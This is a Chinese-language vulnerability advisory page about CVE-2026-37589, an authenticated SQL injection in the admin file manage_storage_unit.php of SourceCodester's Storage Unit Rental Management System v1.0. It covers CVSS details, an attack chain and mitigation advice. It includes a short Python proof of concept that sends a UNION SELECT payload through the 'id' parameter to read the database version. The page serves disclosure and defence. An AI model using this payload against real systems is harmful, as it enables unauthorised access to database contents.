IPBUF安全漏洞报告
English
CVE-2026-37589 CVSS 2.7 低危

CVE-2026-37589: SourceCodester 存储租赁系统 SQL注入漏洞

披露日期: 2026-04-14
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-37589
漏洞类型
SQL注入
CVSS评分
2.7 低危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
SourceCodester Storage Unit Rental Management System

相关标签

SQL注入SourceCodesterWeb安全CWE-89CVSS-Low

漏洞概述

SourceCodester Storage Unit Rental Management System v1.0 版本被披露存在 SQL 注入安全漏洞。该漏洞源于 /storage/admin/maintenance/manage_storage_unit.php 文件未能正确过滤用户输入的数据。尽管 CVSS 评分仅为 2.7(低危),且要求攻击者具备高权限账户,但成功利用该漏洞仍可能导致数据库敏感信息泄露,对系统机密性构成一定威胁。

技术细节

该漏洞属于典型的 SQL 注入缺陷,具体存在于系统的后台维护模块。在 /storage/admin/maintenance/manage_storage_unit.php 文件中,应用程序在接收并处理与存储单元管理相关的参数时,未实施有效的输入验证机制,直接将不可信数据拼接到 SQL 查询语句中交由数据库执行。根据 CVSS 向量分析,该漏洞的利用条件较为苛刻,要求攻击者必须已经拥有系统的高权限账户(PR:H),即管理员级别的登录凭证。在具备此条件后,攻击者可通过发送特制的 HTTP 请求,注入恶意的 SQL 代码。由于向量显示对完整性(I:N)和可用性(A:N)无影响,主要危害在于机密性(C:L),攻击者可以利用此漏洞读取数据库中的特定信息,如用户哈希或配置数据,为进一步的横向移动提供情报支持。

攻击链分析

STEP 1
1. 侦察与认证
攻击者识别运行 SourceCodester Storage Unit Rental Management System v1.0 的目标,并获取管理员级别的高权限账户凭证。
STEP 2
2. 定位漏洞点
攻击者访问后台管理页面,定位到 /storage/admin/maintenance/manage_storage_unit.php 接口,并分析其参数传递方式。
STEP 3
3. 构造恶意载荷
攻击者在易受攻击的参数中注入 SQL 语句(如 UNION SELECT),试图操纵数据库查询逻辑。
STEP 4
4. 数据窃取
数据库执行恶意 SQL,返回敏感信息(如数据库版本、表结构或数据),攻击者解析响应获取数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL url = "http://target-host/storage/admin/maintenance/manage_storage_unit.php" # Cookies for a high-privilege authenticated session (required per PR:H) cookies = { "PHPSESSID": "authenticated_admin_session_id" } # Vulnerable parameter (example: 'id') # Payload attempts to extract database version params = { "id": "1' UNION SELECT 1, 2, version(), 4-- -" } try: response = requests.get(url, params=params, cookies=cookies, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check response for SQL output.") print(response.text[:500]) else: print("[-] Target returned non-200 status.") except Exception as e: print(f"[-] Error: {e}")

影响范围

SourceCodester Storage Unit Rental Management System v1.0

防御指南

临时缓解措施
建议厂商尽快发布补丁修复该 SQL 注入漏洞。在补丁发布前,管理员应严格限制后台管理权限的分配,加强对系统的访问日志审计,并在 Web 应用防火墙中添加针对该路径的防护规则,拦截包含特殊 SQL 关键字的请求。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表